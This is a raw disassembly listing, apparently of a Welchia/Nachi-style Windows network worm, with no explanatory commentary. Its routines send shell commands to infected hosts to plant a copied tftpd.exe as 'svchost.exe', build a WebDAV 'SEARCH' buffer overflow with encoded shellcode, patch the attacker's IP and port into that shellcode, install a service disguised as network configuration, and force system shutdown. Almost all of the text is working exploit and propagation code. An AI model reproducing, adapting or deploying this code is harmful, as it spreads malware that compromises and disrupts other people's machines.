; ---------------------------------------------------------------------------
align 10h
sub_401C80 proc near ; DATA XREF: sub_401990 + 116
var_404 = dword ptr - 404h
var_400 = byte ptr - 400h
var_3FF = byte ptr - 3FFh
arg_0 = dword ptr 4
sub esp, 404h
mov eax, [ esp + 404h + arg_0 ]
push ebp
push esi
push edi
mov esi, [ eax ]
mov ecx, 0FFh
xor eax, eax
lea edi, [ esp + 410h + var_3FF ]
mov [ esp + 410h + var_400 ], 0
push 4
rep stosd
lea ecx, [ esp + 414h + var_404 ]
mov [ esp + 414h + var_404 ], 1388h
stosw
push ecx
push 1006h
push 0FFFFh
push esi
stosb
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [ esp + 414h + var_400 ]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
test eax, eax
jz loc_401E54
mov ebp, dword_404100
lea eax, [ esp + 410h + var_400 ]
push offset aMicrosoftWindo ; \"Microsoft Windows\"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz loc_401E54
lea ecx, [ esp + 410h + var_400 ]
push offset dword_4061BC
push ecx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401D4D
loc_401D1D: ; CODE XREF: sub_401C80 + CB
push 0
lea edx, [ esp + 414h + var_400 ]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
mov [ esp + eax + 410h + var_400 ], 0
lea eax, [ esp + 410h + var_400 ]
push offset dword_4061BC
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz short loc_401D1D
loc_401D4D: ; CODE XREF: sub_401C80 + 9B
lea ecx, [ esp + 410h + var_400 ]
push ecx
push offset aDirWinsDllhost ; \"dir wins\\dllhost.exe\n\r\"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [ esp + 410h + var_400 ]
push offset aDllhost_exe ; \"DLLHOST.EXE\"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea eax, [ esp + 410h + var_400 ]
push offset aDllhost_exe_0 ; \"dllhost.exe\"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea ecx, [ esp + 410h + var_400 ]
push ecx
push offset aDirDllcacheTft ; \"dir dllcache\\tftpd.exe\n\r\"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [ esp + 410h + var_400 ]
push offset aTftpd_exe_0 ; \"tftpd.exe\"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea eax, [ esp + 410h + var_400 ]
push offset aTftpd_exe ; \"TFTPD.EXE\"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea ecx, [ esp + 410h + var_400 ]
push ecx
push offset dword_407628
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
jmp short loc_401E07
; ---------------------------------------------------------------------------
loc_401DF0: ; CODE XREF: sub_401C80 + 142
; sub_401C80 + 155
lea edx, [ esp + 410h + var_400 ]
push edx
push offset aCopyDllcacheTf ; \"copy dllcache\\tftpd.exe wins\\svchost.ex\"...
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz short loc_401E54
loc_401E07: ; CODE XREF: sub_401C80 + 16E
lea eax, [ esp + 410h + var_400 ]
push eax
push offset dword_4075A8
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
mov ebp, dword_4040C8
push 1F4h
call ebp ; dword_4040C8
mov edi, offset aWinsDllhost_ex ; \"wins\\DLLHOST.EXE\n\r\"
or ecx, 0FFFFFFFFh
xor eax, eax
push 0
repne scasb
not ecx
dec ecx
push ecx
push offset aWinsDllhost_ex ; \"wins\\DLLHOST.EXE\n\r\"
push esi
call dword_404168 ; send
test eax, eax
jz short loc_401E54
push 3E8h
call ebp ; dword_4040C8
loc_401E54: ; CODE XREF: sub_401C80 + 5F
; sub_401C80 + 67 ...
push esi
call dword_404170 ; closesocket
pop edi
pop esi
mov eax, [ esp + 408h + arg_0 ]
pop ebp
test eax, eax
jz short loc_401E72
push eax
call sub_402FC6
add esp, 4
loc_401E72: ; CODE XREF: sub_401C80 + 1E7
mov eax, 1
add esp, 404h
retn 4
sub_401C80 endp
sub_401E80 proc near ; CODE XREF: sub_401210:loc_401217
; sub_401210 + 17
push offset aMicrosoft_com ; \"microsoft.com\"
call dword_404160 ; gethostbyname
neg eax
sbb eax, eax
neg eax
retn
sub_401E80 endp
; ---------------------------------------------------------------------------
align 10h
sub_401EA0 proc near ; CODE XREF: sub_401210:loc_401230
var_70 = dword ptr - 70h
var_64 = byte ptr - 64h
sub esp, 74h
lea eax, [ esp + 74h + var_64 ]
push esi
push 64h
push eax
call dword_404158 ; gethostname
cmp eax, 0FFFFFFFFh
jz short loc_401F1D
lea ecx, [ esp + 78h + var_64 ]
push ecx
call dword_404160 ; gethostbyname
test eax, eax
jz short loc_401F1D
mov edx, [ eax + 0Ch ]
mov esi, [ edx ]
test esi, esi
jz short loc_401F1D
movsx ecx, word ptr [ eax + 0Ah ]
mov eax, ecx
push edi
lea edi, [ esp + 7Ch + var_70 ]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ esp + 7Ch + var_70 ]
push ecx
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, 1
mov edx, ecx
mov esi, edi
mov edi, offset dword_407478
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401F1D: ; CODE XREF: sub_401EA0 + 14
; sub_401EA0 + 23 ...
xor eax, eax
pop esi
add esp, 74h
retn
sub_401EA0 endp
; ---------------------------------------------------------------------------
align 10h
sub_401F30 proc near ; CODE XREF: sub_401280 + A5
var_50 = byte ptr - 50h
sub esp, 50h
or ecx, 0FFFFFFFFh
xor eax, eax
push esi
push edi
mov edi, offset aSearch ; \"SEARCH /\"
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ds:dword_4075A0
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, 41414141h
and ecx, 3
rep movsb
mov edx, ds:dword_4075A0
mov ecx, 41h
mov dword_406424, 8
mov esi, offset aU5951U6858U759 ; \"%u5951%u6858%u759f%u0018%u5951%u6858%u7\"...
lea edi, [ edx + 8 ]
rep stosd
stosb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 105h
mov ecx, 41414141h
mov dword_406424, eax
add eax, edx
mov [ eax ], ecx
mov [ eax + 4 ], ecx
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 8
mov dword_406424, eax
lea edi, [ eax + ecx ]
mov ecx, 30h
rep movsd
movsb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 0C0h
mov ecx, 31h
mov esi, offset aU5390U665eU66a ; \"%u5390%u665e%u66ad%u993d%u7560%u56f8%u5\"...
mov dword_406424, eax
lea edi, [ eax + edx ]
rep movsd
movsw
movsb
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 0C6h
mov esi, offset aFfilomidomfafd ; \"ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm\"...
mov dword_406424, eax
lea edi, [ eax + ecx ]
mov ecx, 55h
rep movsd
movsb
mov edx, dword_406424
mov esi, ds:dword_4075A0
add edx, 154h
mov ecx, 3F52h
mov eax, 4E4E4E4Eh
mov dword_406424, edx
lea edi, [ edx + esi ]
mov esi, offset aHttp1_1Host127 ; \" HTTP/1.1\r\nHost: 127.0.0.1\r\nContent - Typ\"...
rep stosd
stosw
mov eax, dword_406424
mov edx, ds:dword_4075A0
mov ecx, 14h
lea edi, [ esp + 58h + var_50 ]
add eax, 0FD4Ah
rep movsd
lea edi, [ eax + edx ]
mov ecx, 14h
lea esi, [ esp + 58h + var_50 ]
mov dword_406424, eax
rep movsd
mov eax, dword_406424
mov esi, offset loc_40597E
add eax, 4Fh
mov dword_406424, eax
lea ecx, [ eax + 0E7h ]
lea edx, [ eax + 0ECh ]
mov dword_40642C, ecx
mov ecx, ds:dword_4075A0
mov ds:dword_407470, edx
lea edi, [ eax + ecx ]
mov ecx, 5Dh
rep movsd
movsw
mov eax, dword_406424
mov esi, ds:dword_4075A0
mov cx, word_406238
mov dl, byte_40623A
add eax, 175h
pop edi
mov dword_406424, eax
add eax, esi
pop esi
mov [ eax ], cx
mov [ eax + 2 ], dl
mov eax, dword_406424
add eax, 2
mov dword_406424, eax
add esp, 50h
retn
sub_401F30 endp
sub_4020E0 proc near ; CODE XREF: sub_401210 + 57
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, ds:dword_4075A0
mov edx, dword_40642C
xor eax, 9999h
push offset dword_407478
mov [ edx + ecx ], ax
call dword_404194 ; inet_addr
mov ecx, ds:dword_4075A0
mov edx, ds:dword_407470
xor eax, 99999999h
mov [ edx + ecx ], eax
retn
sub_4020E0 endp
; ---------------------------------------------------------------------------
align 10h
sub_402130 proc near ; CODE XREF: sub_401210 + 5C
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, dword_406428
xor eax, 9999h
push offset dword_407478
mov word ptr dword_406470[ ecx ], ax
call dword_404194 ; inet_addr
mov edx, ds:dword_407474
xor eax, 99999999h
mov dword_406470[ edx ], eax
retn
sub_402130 endp
; ---------------------------------------------------------------------------
align 10h
sub_402170 proc near ; CODE XREF: sub_401280 + AA
push esi
mov eax, dword_4057DC
push edi
mov ecx, 0D8h
mov esi, offset dword_40547C
mov edi, offset dword_406470
rep movsd
mov ecx, dword_4057E4
add eax, 166h
add ecx, 166h
mov dword_4057DC, eax
mov dword_4057E4, ecx
mov dword_4067D8, ecx
mov ecx, dword_4057E8
mov dword_4067D0, eax
mov eax, dword_4057E0
mov dword_4067DC, ecx
mov ecx, 0B3h
mov esi, offset aFxnbfxfxnbfxfx ; \"FXNBFXFXNBFXFXFXFX\"
mov edi, offset dword_4067E0
mov edx, dword_405484
mov dword_40584C, 100139Dh
mov dword_4067D4, eax
rep movsd
mov ecx, 0Fh
mov esi, offset aC1234561111111 ; \"\\C$\\123456111111111111111.doc\"
mov edi, offset dword_406AAC
add edx, 2C0h
rep movsd
mov ecx, 0Ch
mov esi, offset dword_405AF4
mov edi, offset dword_406AE8
mov eax, 2C0h
rep movsd
mov esi, dword_406480
mov ecx, dword_4064F4
mov edi, dword_406524
mov dword_406478, edx
mov edx, dword_4064F0
add esi, eax
add edx, eax
add ecx, eax
mov dword_406480, esi
mov esi, dword_406528
mov dword_4064F0, edx
mov edx, dword_406540
mov dword_4064F4, ecx
mov ecx, dword_4065FC
add edi, eax
add esi, eax
mov dword_406524, edi
add edx, eax
add ecx, eax
mov dword_406528, esi
pop edi
mov dword_406428, 5ADh
mov ds:dword_407474, 5B2h
mov dword_406420, 6A8h
mov dword_406540, edx
mov dword_4065FC, ecx
pop esi
retn
sub_402170 endp
; ---------------------------------------------------------------------------
align 10h
sub_4022A0 proc near ; CODE XREF: sub_401780 + 1E8
; DATA XREF: sub_40CB8C + 2Ew
var_14 = byte ptr - 14h
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
var_8 = byte ptr - 8
arg_4 = dword ptr 8
sub esp, 14h
lea eax, [ esp + 14h + var_14 ]
push eax
push 28h
call dword_40409C ; GetCurrentProcess
push eax
call dword_404044 ; OpenProcessToken
lea ecx, [ esp + 10h + var_8 ]
push ecx
push offset aSeshutdownpriv ; \"SeShutdownPrivilege\"
push 0
call dword_404048 ; LookupPrivilegeValueA
mov eax, [ esp + 10h + var_10 ]
push 0
push 0
lea edx, [ esp + 18h + var_C ]
push 0
push edx
push 0
push eax
mov [ esp + 28h + var_C ], 1
mov dword ptr [ esp + 28h ], 2
call dword_404028 ; AdjustTokenPrivileges
mov ecx, [ esp + 10h + arg_4 ]
push 0
loc_4022F7: ; DATA XREF: sub_40CB1Dw
; sub_40CB1D + 29r
or ecx, 4
push ecx
call dword_404148 ; ExitWindowsEx
add esp, 14h
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
sub_402310 proc near ; CODE XREF: sub_401780 + 8
var_9C = dword ptr - 9Ch
var_94 = dword ptr - 94h
sub esp, 9Ch
call dword_404094 ; GetVersion
and eax, 0FFh
lea ecx, [ esp + 9Ch + var_9C ]
cmp eax, 5
push ecx
sbb eax, eax
and al, 0F8h
add eax, 9Ch
mov [ esp + 0A0h + var_9C ], eax
call dword_404098 ; GetVersionExA
mov eax, [ esp + 9Ch + var_94 ]
add esp, 9Ch
retn
sub_402310 endp
; ---------------------------------------------------------------------------
align 10h
sub_402350 proc near ; CODE XREF: sub_402390 + D
; sub_402390 + 21 ...
arg_0 = dword ptr 4
mov ecx, [ esp + arg_0 ]
lea eax, [ esp + arg_0 ]
push eax
push 1
push 0
push ecx
push 80000002h
call dword_40403C ; RegOpenKeyExA
test eax, eax
jnz short loc_40237E
mov edx, [ esp + arg_0 ]
push edx
call dword_404040 ; RegCloseKey
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40237E: ; CODE XREF: sub_402350 + 1B
xor eax, eax
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 10h
sub_402390 proc near ; CODE XREF: sub_401780 + 1D
; sub_401780 + 1DA
arg_0 = dword ptr 4
mov eax, [ esp + arg_0 ]
test eax, eax
jnz short loc_4023AC
push offset aSoftwareMicros ; \"SOFTWARE\\Microsoft\\Updates\\Windows 2000\"...
call sub_402350
add esp, 4
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4023AC: ; CODE XREF: sub_402390 + 6
push offset aSoftwareMicr_0 ; \"SOFTWARE\\Microsoft\\Updates\\Windows XP\\S\"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
push offset aSoftwareMicr_1 ; \"SOFTWARE\\Microsoft\\Updates\\Windows XP\\S\"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
retn
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_402390 + 2B
; sub_402390 + 3C
mov eax, 1
retn
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
sub_4023E0 proc near ; CODE XREF: sub_4015E0 + 61
; sub_401660 + 5C
var_110 = dword ptr - 110h
var_10C = dword ptr - 10Ch
var_108 = byte ptr - 108h
var_107 = byte ptr - 107h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 110h
push ebx
push ebp
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
jnz short loc_40240A
pop edi
pop esi
pop ebp
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_40240A: ; CODE XREF: sub_4023E0 + 1D
mov ecx, 41h
loc_40240F: ; DATA XREF: sub_40A2D7 + 3w
; sub_40A2D7 + 13r
xor eax, eax
lea edi, [ esp + 120h + var_107 ]
mov [ esp + 120h + var_108 ], 0
rep stosd
mov edi, [ esp + 120h + arg_8 ]
lea eax, [ esp + 120h + var_108 ]
push edi
push offset aCWindowsSystem ; \"C:\\WINDOWS\\system32\"
push offset aSWinsS ; \"%s\\wins\\%s\"
push eax
call dword_40411C ; sprintf
push offset aSvchost_exe ; \"svchost.exe\"
push edi
mov esi, 2
call dword_404140 ; _stricmp
add esp, 18h
test eax, eax
jnz short loc_402456
mov esi, 3
loc_402456: ; CODE XREF: sub_4023E0 + 6F
push 0
mov edx, [ esp + 124h + arg_4 ]
push 0
mov eax, [ esp + 128h + arg_0 ]
push 0
push 0
lea ecx, [ esp + 130h + var_108 ]
push 0
push ecx
push 0
push esi
push 110h
push 0F01FFh
push edx
push eax
push ebp
call dword_404030 ; CreateServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_4024A3
push ebp
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_4023E0 + AD
mov ecx, [ esp + 120h + arg_C ]
push 0F01FFh
push ecx
push ebp
mov [ esp + 12Ch + var_110 ], offset aManagesNetwork ; \"Manages network configuration by updati\"...
xor esi, esi
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jz short loc_402507
push 400h
push 40h
mov [ esp + 128h + var_10C ], esi
call dword_40408C ; LocalAlloc
mov esi, eax
test esi, esi
jz short loc_4024FC
lea edx, [ esp + 120h + var_10C ]
push edx
push 400h
push esi
push 1
push edi
call dword_404004 ; QueryServiceConfig2A
test eax, eax
jz short loc_4024FC
mov eax, [ esi ]
mov [ esp + 120h + var_110 ], eax
loc_4024FC: ; CODE XREF: sub_4023E0 + FC
; sub_4023E0 + 114
push edi
mov edi, dword_404034
call edi ; dword_404034
jmp short loc_40250D
; ---------------------------------------------------------------------------
loc_402507: ; CODE XREF: sub_4023E0 + E5
mov edi, dword_404034
loc_40250D: ; CODE XREF: sub_4023E0 + 125
lea ecx, [ esp + 120h + var_110 ]
push ecx
push 1
push ebx
call dword_404000 ; ChangeServiceConfig2A
test esi, esi
jz short loc_402526
push esi
call dword_404090 ; LocalFree
loc_402526: ; CODE XREF: sub_4023E0 + 13D
push ebx
call edi ; dword_404034
push ebp
call edi ; dword_404034
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 110h
retn
sub_4023E0 endp
; ---------------------------------------------------------------------------
align 10h